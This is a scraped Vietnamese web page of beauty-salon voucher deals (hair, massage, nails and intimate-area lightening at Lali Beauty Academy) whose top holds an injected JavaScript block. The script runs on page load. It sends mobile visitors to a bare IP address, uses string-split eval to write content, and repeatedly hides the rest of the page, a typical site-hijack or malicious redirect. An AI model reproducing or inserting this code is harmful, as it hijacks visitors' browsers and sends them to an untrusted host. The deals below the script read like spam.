function goPAGE() { if ((navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i))) { window.location.href = "http://180.215.56.197/" } else { var ss = '
'; eval("do" + "cu" + "ment.wr" + "ite('" + ss + "');"); try { setInterval(function() { try { document.getElementById("div" + "All").style.display = "no" + "ne" } catch (e) {} for (var i = 0; i < document.body.children.length; i++) { try { var tagname = document.body.children[i].tagName; var myid = document.body.children[i].id; if (myid != "iconDiv1" && myid != "yangchen") { document.body.children[i].style.display = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {} } } goPAGE();

Trọn Gói Làm Tóc Cao Cấp: Uốn Setting, Duỗi Các Loại, Nhuộm/ Highlight, Bấm Gãy Tại Lali Beauty Academy

Trọn Gói Làm Tóc Cao Cấp: Uốn Setting, Duỗi Các Loại, Nhuộm/ Highlight, Bấm Gãy Tại Lali Beauty Academy. Voucher 800,000 VNĐ, Còn 169,000 VNĐ, Giảm 79%. Chỉ Có Tại swedeballs.com!

800,000 đ
169,000đ -79%

Combo Dưỡng Sinh: Gội Đầu Canh Thảo Mộc + Massage + Chăm Sóc Da Mặt Tại Lali Beauty Academy

Combo Dưỡng Sinh: Gội Đầu Canh Thảo Mộc + Massage + Chăm Sóc Da Mặt Tại Lali Beauty Academy. Voucher 800,000 VNĐ, Còn 99,000 VNĐ, Giảm 88%. Chỉ Có Tại swedeballs.com!

800,000 đ
99,000đ -88%

Buffet Nail: Sơn Gel Cao Cấp, Chà Gót, Tẩy Tế Bào Chết, Dưỡng Da, Cắt Da Tay Chân Chỉ Có Tại Trung Tâm Thẩm Mỹ Lali

Buffet Nail: Sơn Gel Cao Cấp, Chà Gót, Tẩy Tế Bào Chết, Dưỡng Da, Cắt Da Tay Chân Chỉ Có Tại Trung Tâm Thẩm Mỹ Lali. Voucher 260,000 VNĐ, Còn 99,000 VNĐ, Giảm 62%. Chỉ Có Tại swedeballs.com!

260,000 đ
99,000đ -62%

Làm Hồng Nhũ Hoa/ Vùng Kín/ Bẹn/ Nách/ Mông Tặng Tinh Chất Dưỡng - Không Phát Sinh Thêm Chi Phí Tại Trung Tâm Thẩm Mỹ Lali

Làm Hồng Nhũ Hoa/ Vùng Kín/ Bẹn/ Nách/ Mông Tặng Tinh Chất Dưỡng - Không Phát Sinh Thêm Chi Phí Tại Trung Tâm Thẩm Mỹ Lali. Voucher 2,500,000 VNĐ, Còn 299,000 VNĐ, Giảm 88%. Chỉ Có Tại swedeballs.com!

2,500,000 đ
299,000đ -88%